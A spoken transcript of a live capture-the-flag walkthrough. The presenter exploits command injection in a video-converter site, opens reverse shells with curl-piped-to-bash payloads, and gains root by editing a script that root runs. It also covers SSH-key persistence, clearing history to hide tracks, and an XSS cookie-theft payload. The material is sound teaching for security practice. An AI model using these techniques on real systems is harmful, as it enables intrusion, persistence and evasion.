Zero.
Zero.
I have 0 days back.
Okay, so we're gonna just do a regular video ID. I just randomly put something in there just to see what happens. And then we're gonna use burp to proxy that traffic, which we see that request here was sent through with all those random letters that I just typed in. I'm gonna send that to the repeater so I can repeat the request and then I give me the response, which I don't see yet. It's hanging. And that YT URL equals is, that's the parameter that is required. So basically, whatever you put in here, this is the payload that gets sent to the server right here. Not responding yet, but let's try something simple like it might error.
Maybe who am I? Maybe it's that easy.
I don't think it's
that easy. It'd be like, oh.
If it was that easy. Let's try something smaller. Forward. There is no response, it doesn't look like, so the server is not completely up yet, it looks like. Let me just give it a second. Let's port scan it. And if anybody has questions while I'm doing this in the middle, please feel free to ask.
So yeah, rustscan. I've never seen anybody use this. Everybody's usually nmap. So
nah, this is the best tool. What do you mean, G?
Okay, I didn't know. I'm learning something new. That's what's awesome about this field.
Yeah, so rustscan is good for CTFs. It scans all ports very fast. As you saw, it just went through all of them in seconds rather than minutes. You can make nmap faster, but rustscan's a good tool to scan very quickly, and then it takes whatever ports are available or open, and then runs them with whatever specific flags in nmap. So if you see how I did tac or 2 hyphens, and then gave the flags that I would have put in nmap. So it just took port 80 and 20, and then it's using these flags to look for the versions of things and running safe vulnerability checker scripts. So that's what this flag is in nmap. If you were in nmap and you did this, tac, you could scan all 65,000 plus ports, and then you could do tac T5 and it would run really fast, or you could use min rate equals whatever and make it really fast. You can make nmap, very close to, if not just as fast as rustscan, but I do like rustscan for a couple reasons.
Me too.
So Redstone was here, open ports, 0 day was here. I'm in the source code, so I like using it.
Nice. That's fascinating. I'm in the source code.
Yeah, I like that. If you do cargo install rustscan, you'll get the 0 day was here flag. I don't know why this isn't responding to me right now, though. I need that to work to get. Oh, here we go. One did respond.
I isolated your telephone, and I'm going to post a picture of it in the sidebar. Yeah. And it's amazing what artificial intelligence can do now with just a fuzzy picture that I took quickly.
That's awesome. It's a 1990 Protel that's refurbished. That's the exact phone it is. I'll actually post a picture of the whole room for you guys. 1 second. Yeah, the phone number is not there. But it is on my social media, so I'm surprised you haven't found it yet.
I haven't. I'm
Yeah, right?
Yeah.
My God.
I got a picture of here we go. Here's the whole room with the payphone in the side chat.
Nice. Looks like an R7000.
The light is amazing.
It's like Do you have a Faraday mat over your desk? What is?
No, that's just the keyboard. Are you talking about the airplane wing keyboard
Yeah, the
or
thing,
airplane wing desk? I'm sorry.
airplane wing desk. That's what it is. Okay.
Yeah. So this is not responding for some reason with just YouTube URL. Let me just take this old school and we'll curl it. That responds. So let's do a data flag with data equals, I think it is, YouTube, that parameter, URL. Tag H. Okay, so hold up. This actually did respond with a post request. Let's see. It is sending a post and responding. For whatever reason, burp is not responding though. Do I need to put the content type in here? No.
So are you just
What
trying
does
to
burp
verify that the target machine is there still?
Well, no, it is. It's just burp isn't responding to it for some odd reason.
So that worked.
Yeah, this is sending a post request. So we just have to figure out what to do next and what data is being sent along, which I'm trying this, but let's try tac help.
Can we use Kaido instead of burp?
I don't use that personally. I don't have anything back. And the reason that I'm going to be doing this is if you guys want to see, because of this right here, it appends the YouTube video, gives the YouTube ID, in which we see that in burp right here. So I on URL encode that to see all it did was append what I typed into the site. So I'm just trying to replicate it with curl because for whatever reason it's not responding here. We'll see.
Sidebar's asking about what kind of monitors you have and the PC that you have.
PC is just custom built, and then the monitors are Scepter brand. They're just $200 monitors from Amazon.
See, you don't have to have $1 million setup to be able to do this, guys.
No, you definitely do not. Let me get an actual real YouTube ID because maybe it needs that for some reason.
So what is the quest? Like, what did this CTF ask you?
Here we go. We just got something in the middle of what you were saying. Sorry, go ahead.
What did the CTF's challenge? What is it asking you to do?
So the goal here is to take this convert my video thing and I'm assuming get code execution on the server and then escalate privileges. But all we know right now is that it takes a YouTube video link, it appends the the ID to it, and then right now it downloads it and it stores it as an MP3 file on the server. But since I did the backticks to insinuate just running code within something, so if I show you in my terminal, if I do like this, right, and then I just do uname tac R or tac A, whatever, you should see. Hold on. Just try something. Let's do something simple. So if I do who am I, we're going to get root, right? But if I do who am I, and I do this, and I do ID with 2 backticks, you see how it still ran the ID command there? So I'm doing the same thing in the terminal. And since we know now from this error that it's using, I happen to actually know what YouTube DL is. So now I know it's running YouTube DL straight from this parameter. And I can get code execution from here. So if I do ID, I should get whatever user this is running as
did.
in the error here. Yep, right here. www data is not a valid URL.
So now you've pretty much done the recon. You're about to try and create a reverse shell next. Is that what your procedure would be then?
Yeah, the goal would be to get a reverse shell from here, but since I don't know how easy that's going to be, so we're about to find out. And I'm going to do it in a little bit of a different way. We can use my website. This is actually a site I created called revshells.com. And this is I like to call this one Old Faithful because it works almost every time. And we will take that, throw that in here, and then we're going to have to URL encode it, Control U. I don't have a listener running, so it's not going to connect back. But let me send it again. Yep, I'm listening in, for an incoming connection. So basically, what this is doing is it's trying to spawn bash on this remote machine, connect to my IP address on port 9001, and then I would receive that connection here if the code execution succeeded. In this case, we have an EOF in backquote substitution. So basically, what that means to me is I'm going to have to find, other than using pluses for spaces, I'm going to need to do something else. Maybe something like IFS, which is like a field separator. I don't know if anyone here is familiar with that, but it's like there's different ways you could do it. But let's just try money symbol, curly bracket, IFS, curly bracket. Then instead of spaces, I'm going to use these. Where instead of a plus is burp, a plus could be %20. Which is the URL encoded version, or it could be what I'm doing here. Is that a space? Yeah. That didn't work. Let's try to URL encode it. Yep, there we go. Connection. Oh, it didn't work, but we got a connection, so we know we're getting closer. All right, what happened here? No such file.
So this is what I describe as you have a reverse shell. It's just not stable yet. Now you're going to try and stabilize your reverse shell.
Yeah, I'm going to try a different reverse shell payload. I'm going to try a different reverse shell payload. Try the exec bash payload. Yeah, we'll use this one.
I didn't want to interrupt you, but I found the number. I'm super happy.
Good job.
But I'm trying to.
A lot easier to find than you thought, right?
Yeah, no, it was right there. I just had to open my eyes.
That's
And
right.
That's your security lesson of the day, guys.
Yeah.
So when you go back to this, there's this other injection site that you're using where you said you use Old Faithful. When you go back to that, you mind explaining that a little bit more?
Yeah, of course.
Program and what it is.
Yeah, it's actually my site, revshells.com. I'll show you in a second, once we get a reverse shell, why it's important. You know what I could do? I got a plan, actually. You know what? We're going to make this thing happen. So I'm going to serve one up here. Let's just do revshell.sh, and then we're going to add a shebang line, even though we kind of don't need one. Let's throw, oh no, we don't need IFS in there for this. Let's grab this exec payload. And then we're going to do python tac m http.server port 80. So now we got a server that's running in this folder for revshell.sh. It's going to download that. So let's do wget money symbol IFS for space. Let's copy that. Put in my IP. /revshell.sh.
So here you're
and then we need another space.
You're trying to send something to the server now. This is a little bit different technique than just encatting and then trying to open a shell.
Yeah, so we're going to do it, and it's going to take 3 different attempts unless I can do it in one. We'll see. So let's see if that downloads. Yep, that just downloaded with a 200
Nice.
onto the server. And then since I specified an out folder in temp revshell.sh here, what I'll do is I'll chmod for permissions, space, plus X to make it executable, space, /temp /revshell.sh. Now it should be executable. Now we can straight up just do bash with a space on that file and come on, give me a reverse shell. Nope,
You
didn't work.
But you didn't try though. Or does it have to report something there?
What?
On the left-hand side where you have ncat, does it have to say something here?
No. I just downloaded this straight from the server. So basically, that rev shell didn't work. So let's just go with the regular bash one, and I'll add to it a little bit. So I'll do bin bash tag c, and then just do bash tag I. So we're going to do essentially the same thing, host it again. I'm going to go back to my wget. And then we're going to name this one revshell.sh, overwrite it. It's actually going to add a .1, I would assume. You know what? Let me rename it just to be sure of that. Move revshell to test.sh. We could have done it here too in the out file, just named it something different, but it's all good. That downloaded test.sh. Now let's chmod it. Or how many times I got to go forward here? I guess not. Now we just got to execute it. Give me a shell. What's it saying here? Permission denied. So it's not actually giving me permissions. The issue here. Permission denied.
Maybe
So would
try
this be considered your bind shell, or is that only like one?
say that again, Koji. It was a little bit muffled there. Not quite
Would
clear.
would this be considered your bind shell?
No, this is a reverse shell. But it's not working. Like right here, I just tried to download the file and then pipe the output into bash. I could try that with curl too, instead of wget. There we go. Now we got a reverse shell.
So what did you do
Okay.
differently there?
Nice.
Because you struggled a teeny bit, and then all of a sudden it was like I solved it. But so explain a little bit more
What I was
how
trying
you
to
solved
do-
that.
What I was trying to do originally was download the file onto the server, which we'll see in a second will actually be on the server. And then I was trying to change permissions of that file so that I could execute it. So it would take 3 separate requests to execute it. In this one, I ran curl, which downloaded the file. And then I used the pipe symbol. And I piped the whatever came from this file, which is this right here. This, I just piped this to bash. So it's essentially just like if I went /test.sh pipe bash. This is what I did in a request. Now let me stabilize this shell. Well, it's frozen now for some reason, so we're gonna have to run it again.
You have to launch server now.
So now you have a shell, but you still might need to go another step to make a stable shell as well, or do you do
Yeah.
that? Yeah, you do that. But it's wondering what made your shell unstable. Like, is there a program that's killing process? There can be a lot of different defense mechanisms there.
Yeah, but in this case, it was I think it was just because I switched the size of the terminal. We'll see. Oh man, I just messed it up last second there. me just type it out in here. This should do it. There we go. STTY raw minus echo foreground export term is equal to X term. Now I should be able to clear the screen. I should be able to hit Control C. And you can see now in temp, if I look at where we're in var.whtml, we have test.sh. That out file wasn't actually working because I guess wget must be TAC capital O, I would guess. Maybe I just had a brain fart there. Let's see. No, that TAC O was lowercase, but I did, so what in my command earlier, I did wget this, my IP, / test.sh tac o temp / revshell.sh, and that actually works. So if I go to temp, now it's there. So it actually did work. It put it in here, and it just doesn't have the execute permission there, if you see. So that's why it wasn't working until I piped it straight into bash. Does that make sense to anybody here?
Yeah. That's really cool.
No.
You see, when I tried it multiple times, you see how it was appending a .1 and a .2, but inside of all of those, they're all exactly the same. If I do cat test.sh.1, the same exact thing, .2, same thing. But if I do rev shell, this one will be different.
Is it this understanding you were trying to run that command as a file, and then instead you did a direct attack running that command, and then that opened your shell?
Yeah, so I can't make this any bigger really, but so you see how this is curling the file, which means downloading it, using IFS as a space, s.sh, then we're using the pipe symbol, and then we're taking anything that comes from this file and sending it to bash to execute. Now we're going to do some enumeration on the machine. We can run linps, or we can run by hand. So we're going to look at the cron tabs first, which is obviously what you would do on tryhackme. There's nothing there. We're going to do sudo tac-l, but there is no password. We don't have one yet for data. linps is a good tool. We'll run that after, but I want to run what's called pspy first, called process spy. Yeah, I should have it right here. Or let's see. Do I have P? Yeah, I have pspy right there. So we'll do uptac p. This is one of my custom things. It tells me everything's in the folder, tells me my current IPs, and now I'm serving on all interfaces. So now I want to grab that pspy from here, and I'll do curl http 10.13.024 / pspy, and then we'll put the out file as pspy, and we see that just came in. It's downloading it. And we can see now pspy is on the server. You can see the size of it. We have to give it executable permissions. Now it's got that executable permission I was talking about earlier that these didn't. That's why we didn't get the reverse shell. And then we're going to I'm going to pspy, but I'm going to use T. I'm going to save it as www.pspy. And T, what it does is it just saves the output on the screen. So if for whatever reason I have to kill this, everything gets saved to everything that comes from this, from any program, comes straight to, saves straight to this file, www.pspy. This could be named whatever you want. I'm using the binary T to do that. So we see that this is running, which is the YouTube download, extract audio, all of the things that we tried earlier. These are all running processes on the machine as we speak. And if we see anything pop off from here, if it's not that, we can go down that route. So let's see what happens from there. Okay, so here we go. I was somewhat correct in what I thought. We don't need to run linpiece. See, this is running bash on something in var www.html temp clean.sh, and it's running at UID 0, which means root. So we're going to take this directory, which just, without going. Now you see we have www.pspy. I can cat that out to look at it whenever I want now because we did that. So I would highly recommend you do that with linpiece, you do that with pspy, you do it with anything. Make sure you do p whatever dot whatever, and it will save that as a file. But for right now, since we know this is running as root, I guess every minute or every 2 minutes, however often it's running, it's just deleting the downloads folder. So let's see what the downloads folder is.
Pspy is also really good to use in like King of the Hill too.
Clean.sh is sitting here. It's owned by dub data, but root is running it. So it's removing downloads. We don't even have downloads. What we can actually do, since dub data, this is actually going to be easier than I thought. Dub data owns this file and root is running it. So I can actually just put a reverse shell in here, I believe, and then just get root. I think this one's going to be a lot easier than expected. Let's try it.
Oh yeah, sorry.
That's so smart, though.
Let's try. Let's see if we can get a reverse shell from this because we know root's running it. So let's watch root run this thing. Go back to temp. Let's run pspy just to watch it happen. And then when this runs clean again, instead of it deleting downloads, it should connect right here, and we should have a root shell on this box.
Wow.
Yep, here we go. You see that? So it just ran.
Right.
It just ran right here, clean.sh again. And then now if I say, who am I? I'm root. So if I cd to root, now I can cat the root flag, and we're done.
Wow.
Nice.
That was 39 minutes. That's about the same speed you did the other machine.
Well, does anybody have any questions before I kill this thing?
I watched the entire process and I'm so confused.
Well, what are you confused with? I can run it back.
Can you just explain your thought process through the whole thing and
Like
what
where
you were doing with reverse.com?
Like where you transition from when you couldn't get the shell, and then you transition strategies there to trying to get the shell different, and then how you stabilize that shell. And then from there, then it kind of blurred for me. All of a sudden you were root. So,
So, all right, I'll just run it from the beginning. So basically, we have a website that converts videos. And in the output of that, if I were to take this and just do who am I, we see, this is just, if I was putting that URL straight here, this is the output from that. And it tells you in here that it's YouTube DL, which means it's running a program on the server. Since I use these backticks, since it's a remote code execution, it's built into Linux, but it's a trick you can use in web challenges in certain cases to run code. So you see how www data is showing up in this error. So twice. So from here, I was like, okay, well, if I can get code execution, let me just throw a reverse shell payload in here. That didn't work. I got an error that I can show you again. The error that I got said that it had an EOF error. So you see EOF in back quote. So I tried to URL encode it, and I still wasn't getting a thing. I was still getting the same error. So I said, okay, well, instead of using these plus symbols, let's just use field separators. And that's how we ended up with these field separators here instead of spaces, because these are essentially the same as a space. And then the original thought process was going to be to download this file from my machine, which is over here, which is just a reverse shell payload. That's all this is. I'm hosting a server that has this file in it. And then once it downloads that file, it runs it on the remote machine and then connects back to my machine that's listening right here. Does that make sense?
Yes.
I have a question. Like the IFS, like, is there a website for like
Replacing the
similar
spaces.
things like that?
Yeah, so if you look at like RCE filter breakouts or RCE filter bypass, you'll find a lot of things like that.
Thank you.
No problem.
Oh, wait, and you didn't find that in the cron tabs, right? That it was running that. Where did you find that it was running
No,
that program?
you're very quiet, but the way that I found that was I would have ran. You could find it with linpeas as well, which maybe I'll do real quick just to show you. Slash privesk linpeas up port 80. So let's run linpeas on this box real quick. Oops. I don't know why the dot stops working there for some reason. Did that twice now. Oops. That linpeas p www.peas. Now we can run linpeas, and this is going to look for common vulnerabilities and odd files on the server, and it's going to color code them. And then I'll show you there's an extra flag.
Would you consider this like a good forensics tool? Is that what linpeas is?
I would say it's more of an offensive security tool, but here it is right here. So you see how root is running this clean.sh file.
Okay.
And then since we know that linp is also another thing to take into consideration. If I do linps tac h, there's an an all mode like tac a. I just remember it in my head as aggressive, and it checks 1 minute of processes. So if for some reason you didn't see it in that process list, you can do linps tac a, and it's going to do a more aggressive search, and it's going to find that when it scans the processes without having to use pspy. I just like to use pspy because it's what I'm comfortable with.
Okay, cool. And then that pipe TTY thing that you did, or I think it was something.
Yeah, I'll show you how to stabilize the shell. So I'll spawn another reverse shell and show you what's happening there. So over here, I'll set up a listener that's waiting for a connection. I'm going to send it a reverse shell. If I hit Control C, it immediately dies. You see that?
Yeah, yeah.
If I start it again, now to stabilize this, we're going to do which Python 3, make sure Python 3 is on the machine, which it is. So if I do Python 3 tac C for command, import pty dot on bin bash. So what this is doing is it's importing the module pty. I'm executing pty.spawn, which means just run the sudo terminal for bin bash. Hit enter. You're not going to get any output here, but then from here, you're going to do Control Z, which backgrounds the process. Now you're back on your machine. I'm going to do stty raw minus echo semicolon fg. So that's going to foreground this process, and it's going to mirror my terminal. Enter, enter. You're not going to see anything on the first enter. The second enter will bring you back. Now I can hit Control C, but if I hit Control L, I already exported the term. But normally you wouldn't be able to clear the screen with Control L, so you do export capital term equals lowercase x term, and then Control L will clear the screen. And if you want to get extra granular with it, because you'll see how that goes over top of itself.
Yeah.
That could be annoying in certain cases. So open a brand new terminal window. It's the same size, and do stty tac a, and we see that rows are 22, cols are 102. So if I do stty rows 22, cols 102, and we do the same thing, now we have a terminal that is exactly the same, and we can Control C it. We can run commands that are multiple lines without overlapping text, and we have a pretty much 100% stable shell.
Very cool. Thank you.
And then does anyone understand how I got root on this machine?
I do,
Yeah.
but one thing was flimsy for me. That you just like the clean.sh. What does that do? Like it gets ran by root, but is it like a time based?
Yeah, so every minute, what it was doing was removing a folder called downloads. And we own this file since we're data. We own this clean file, but for whatever reason, root was running it every minute to delete the downloads folder. And since we have the permission to write into it, root has a scheduled task or process that's automatically running it regardless of what's inside of this. So if I would have put rm tac rf / no preserve root in here, it would have deleted the whole server in a minute because root would be running it regardless. It's not checking what the contents of this file is. So instead, I just put a reverse shell payload in here that connects to me at this port, and then I was listening in a different window, and then boom, root came back since it ran that process anyway and gave me a shell as root.
And where does it tell you that it runs it like every minute?
It doesn't tell you that it runs every minute. I could try to find on here where that schedule or where that process is that it's running every minute, but it's kind of irrelevant to like.
Yeah, no, yeah. Got it. Thank you, man.
Yeah, no problem. I mean, we can a lot of. Actually,
Let's say we don't have Python 3. What are you gonna do?
There's something called watch. So if I do this, so like every second we're watching the file clean. But if I do watch lsla on clean.sh, we can watch every second and see if something like, let's say the permissions were to change on this file or the size of it changes, and then every second this file is updating. We could do it. We could do if something was changing, but in this case nothing was changing. The only way to have seen this would have been to do ps aux and just constantly spam this thing until we saw clean.sh because it's only going to come up as the process is running.
Yeah.
But we could probably do this. Let me see. Yeah, so every second we could do watch tac n n1 on ps aux and watch that, but it's kind of big. I don't think it's realistic to watch this every second. But you could, I guess, put it to a file. Let's see, ps list.txt, and then just leave it here, and then we could check back on it. But it's just going to keep. Well, no, I guess we couldn't do that. Let's try this. I'm actually curious if I can append to it instead of overwrite it every second. Let's see. No, not a sustainable way to do this. Yeah, it's a big mess.
There we go.
But yeah, I mean, there's a lot we could do from here. I mean, we already have root on the machine, but I mean, we could stabilize this root shell, and then we could, gain persistence on the machine. We could look around and see how the box creator, created that process that's looking for clean. We could do a ton of things because we have full access to the machine. There's not any higher level access than root. As root, you can install kernel modules, which then give you even more access, so that you can make root give root less permissions with kernel modules, as I showed in the last forensics challenge.
Thank you for clarifying. Sorry, my mic was muted.
No problem.
What if the Python isn't available in the machine? How do you stabilize it?
What with Python? Sorry.
Like if the Python 3 isn't available on the machine you're landing in, how do you stabilize it?
So if the reason why is because I did which Python 3, I could do which Python 2. Oh, sorry, which Python. So this machine happens to have both. So let's say you go on to you get a reverse shell and it only has regular Python 2 or Python, whatever, whether it's Python 3 or Python. If you try to use that stabilize command with, let's say 3.7, and I did it, whatever command, it's going to say it's not found, right? So you want to know which Python is on the machine, and then you can use that to stabilize the shell.
What if there isn't any Python binary in the machine? That will be a rare case, I guess.
I'll show you. Like you can run Python all in one line, as I'm doing right here. See that? I imported OS. I ran os.system who am I, and I got data. or I could do ID, and it runs ID. So you're just using Python to run a system command.
Okay.
But yeah, going back to the last thing I guess I'll add here is revshells.com makes this really easy because here's your listeners, a bunch of different listeners. But if you want to keep it simple, your Netcat listener, put in the IP of your VPN, whatever port you want to use. Pick the operating system if you don't know what's which. You want to use a bind shell, they're here. MSF Venom for Metasploit, Hoax Shell for more obfuscation. But in this case, there's a ton of different reverse shells for all different languages and different servers.
Wow.
The top few here are the most popular, of course. And you could just straight up copy it from here, or let's say you wanted to get special with it and do special alfsec payload to bash, right? And then you hit raw. Now it gives you this URL here that's URL encoded already that you could take and curl that straight from the server and pipe it to bash. And you never have to put a file like how we did with Python. This is a VM on a CTF, so it doesn't have a connection to the internet, so it can't hit this. But a server in the real world, you could curl straight from rev shells, not download a file and pipe it right into bash, get a reverse shell straight from my website.
Sidebar question. I would say this is pen testing. This is attacking.
Yeah, that would be more
system.
for pen testing. Yeah, what I just showed you there.
Well, he asked a very general question of what is the process of getting root access called?
Oh, privilege escalation.
Any more questions for Ryan?
There we go. And then we could do sudo do. No, we can't do that. Let's do switch users to root. Put the new password in. And look at that. Now we're root with a stable shell. We can get SSH. Is there any key in there? Yeah, there's an authorized key. So check this out. If we wanted to get a real stabilized shell, we could go into, let's do this. Watch this. SSH egen, TACF, IDRSA, no passphrase. Now let's see, there's two files here, a private key and a public key. So let's take this public key. We don't need the end of it, but that's fine. Then we're going to echo this public key with append it to authorized keys. And then we're going to go back onto this machine, chmod 600 on IDRSA, SSH TAC I, IDRSA, root at, and then we need the IP for this box, which is this. And now we have a real SSH connection with no password that we can, do whatever with. We don't need to stabilize this shell because there's an actual SSH.
So I have a question on this behalf because this is what I end up doing usually. Same thing. Now my question's going to be different. Now, did you just create a traceable track on the system of what you've done by building the RSA key and making it so you can access the box anytime you want? So my question's about evasion. If you were to go in and now you wanted to practice a little bit of evasion to make sure your tracks weren't there, did you just make a footprint that is traceable?
Absolutely. Yeah. So in this case, you just threw your public key and authorized keys. You definitely don't want to do that. So you could do echo nothing into authorized keys, and your SSH session is going to stay alive. Do history, C, remove all your bash history. So if I'm hitting up right now, nothing's happening. And that's the only thing in my history is this. But now I still have this SSH session though, but I deleted my public key out of here. If I kill this SSH session, and I'm not going to be able to get in now because I deleted it. See, now I need a password, but I know the password because I reset it already. Oh no, I don't know the SSH. Oh, I guess there's no permit root login, that's a whole other process in Etsy. SSH. I'll show you guys that if you want to see it. SSH config. Why is it being so slow? What? Here we go. So in here, you'll see, I don't know why that wasn't letting me do it, but in here you'll see that there's going to be a permit root login that is password auth, yes. We're turning that on. Then we're going to do permit root login. I don't know if it's already there. We might have to add it. Try it. Start. SSH. And then now let's try this. No. What did I set the path? I think I set it to, yeah, asshole 3. Let me see. I'm pretty sure that is what I just did. Password auth, yes. Permit root login, yes. That's all you should have to do, honestly. And I mean, unless it's SSHD, try that. No. You know what? Let me take the key out. I don't think this is going to matter, but let me try.
Didn't you reset the password?
Yeah, I know. I'm trying the new password. I didn't have the old one. Okay, this is the log. SSH is definitely running. What am I missing here, guys?
And it's allowing root.
Oh, you know what it is? It's SSHD config. This is what it's got to be. There we go. My brain fart there. My bad, guys. This should let me log in with just the password itself. And there should be a password authentication. Yep, right here. Now when I reset SSHD, now we should be able to log in with a password. There we go. That's not going to leave as much of a trace. We'll see that there's going to be our one session here logged in from my VPN IP.
So, what was the command you used to spawn a HTTP server on your machine?
Hey, what server?
HTTP server on your machine to grab the files.
So I personally use this right here. It's called Up. A friend of mine made it with me, so it just makes it really simple.
The UI looks so beautiful instead of the old Python server.
Yeah, this is the standard way to do it, like this.
Yeah.
And then you can
Is
even
this
do it with
binary available?
PHP.
Oh, PHP?
Yeah, you can do it
that's
like
all
that
right.
as well. There's a lot of ways to
Does the
start a
program
regular.
is the program available online? I mean, is it open source?
Yeah, I can give you guys the hold on. It's the Up. Yeah, you guys can use it as well. It's I mean, understanding how this works is important as well, though. But I'll show you. go. I'll put it in the chat.
Thank you.
But let me show you guys real quick. So with up, what I just put in the server, let's say we're on port 80, right? Serving on all interfaces. It looks pretty. So if I do curl localhost, you'll see that that comes in right here as a GET request by default with curl. If I do X post, now we're going to see we have a post request. Now if I do tag D for data, and I'm going to do username equals Rick and password equals now you see how it formats and makes it look pretty. Username Rick, password tells you that it is a post request. But I sent it, in parameters here. So essentially, you could receive something from a server. Maybe it'd be from XSS or it could be from code execution, whatever it may be. With a Python server, if I do the same thing, same exact thing, and I run the same thing here, we just see that it's a post and it's unsupported. But if you use up and run it, now you actually see what the post body is.
Yeah, that's super, super nice.
That's some pretty handy too.
Yeah, it's super useful with XSS because let's say you're on a site and you have something like image src equals x on error equals alert. Let's just say document.cookie blah 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 blah, and then let's say that was actually being sent to your server, and then you did like cookie equals document.cookie. And then you would receive that cookie here, URL encoded, and this automatically is going to URL decode this and show it in plain text from the XSS, whether it be stored or reflected.
That's wild.
Oh, and the last thing I could show you with these random servers. So if I ran it, let's say we create a file called index.php, and I do php echo hello, right? And then I do a Python server. And I try to run and try to look at this localhost /index.php. It just downloads it. You see how it's not even showing the PHP file? But if I do PHP tag S on all interfaces on port 80, let's say, now it's actually running PHP. See how it's not showing? If I look at the source code, we're not seeing what's actually in this file. We're not seeing the PHP code because it's actually executing PHP with a PHP development server. So everything has its use case is basically what I'm getting at here.
I have a quick question, if you don't mind.
Sure.
It's kind of unrelated. I have two questions, actually. First of all, I saw on your website, ryanmontgomery.me, that your email is not 0day at proton.me. Do you think that Proton Mail is the best email privacy service out there?
No, I just think it was, I was trying to get somebody to send me an email, so I put that up like less than a week ago. I'm only going to be using that for a couple more days. But if you notice, I had a PGP key there as well, which encrypts the email for both sides. And even Proton Mail can't see what somebody sends or I send.
Gotcha. Thank you.
They kind of already do that by default, but if you want to be double sure they're not seeing it, then you create your own public key and add it to your account.
Oh yeah, and another thing. Second question. How long have you been hacking?
For 20 years.
For 20 years. Wow.
Yeah, but I know that sounds like, okay, yeah, he's going to have an advantage, which there are many people that are way better than me. But, if I were you guys, especially the younger people here, and had the resources that are available right now, I'd be 10,000 miles ahead of where I'm at right now because of the resources that are out there. Like I said, there weren't everybody in here earlier. Like I'm learning every day, back to back to back. There's so much to learn in this space, and 20 years sounds like a long time, but just say 15 years of it, or not 15, but close to it. The only resources I had were other people, other people teaching me things. I couldn't go out and just, ask ChatGPT how to do this, or how to write a script for that, or how to start a web server for this, or how to change a config file to do this or that. Like, I had to figure that out by doing research.
Yeah,
So
that's
20 years
yeah.
sounds good, but it doesn't really mean much.